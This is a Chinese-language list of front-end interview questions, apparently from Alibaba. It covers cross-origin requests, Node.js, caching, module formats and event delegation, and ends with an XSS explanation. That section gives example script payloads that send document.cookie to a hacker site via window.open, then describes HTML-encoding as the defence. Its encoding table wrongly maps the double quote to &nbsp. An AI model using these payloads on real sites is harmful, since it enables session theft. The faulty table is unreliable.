ali面试

1 自己介绍

2 了解的前台和后台技术

3 怎么跨域

4 有没有看过jquery源码

5 了解node.js吗？

6 从输入网址到加载到界面的过程？

7 怎么解决大数据问题。

8 HTML5技术了解。

9 有写微博的习惯吗？写些什么？

10 做过什么项目？

11 数据库了解哪些？对数据库知识学过什么？知道索引吗？

12 缓存问题。

13 amd和cmd的区别

14 图片旋转90°

15 在ul子孩子li上添加事件,该li不一定存在。

16 xss攻击

xss(Cross Site Scripting)跨站脚本攻击，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的特殊目的。主要来自内部和外部的攻击。

1 用户A登陆网站a.com后，他又点击了某个链接，例如：http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>，而b.com是黑客网站，这样就得到了用户的cookie。

2  用户A和我都登陆了系统，我发表了一篇文章，文章内容有<script>window.open(“www.b.com?param=”+document.cookie)</script>，保存后，A查看该文章，则其信息会泄露给我。

防御为：对用户的输入进行过滤，把< >  & "等进行转换为HTML encode,，例如

<为 &lt    >为&gt     &为&amp   "为&nbsp

<script>window.location.href=”http://www.baidu.com”;</script>

转为：&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;存储，在浏览器以文本形式显示。即可。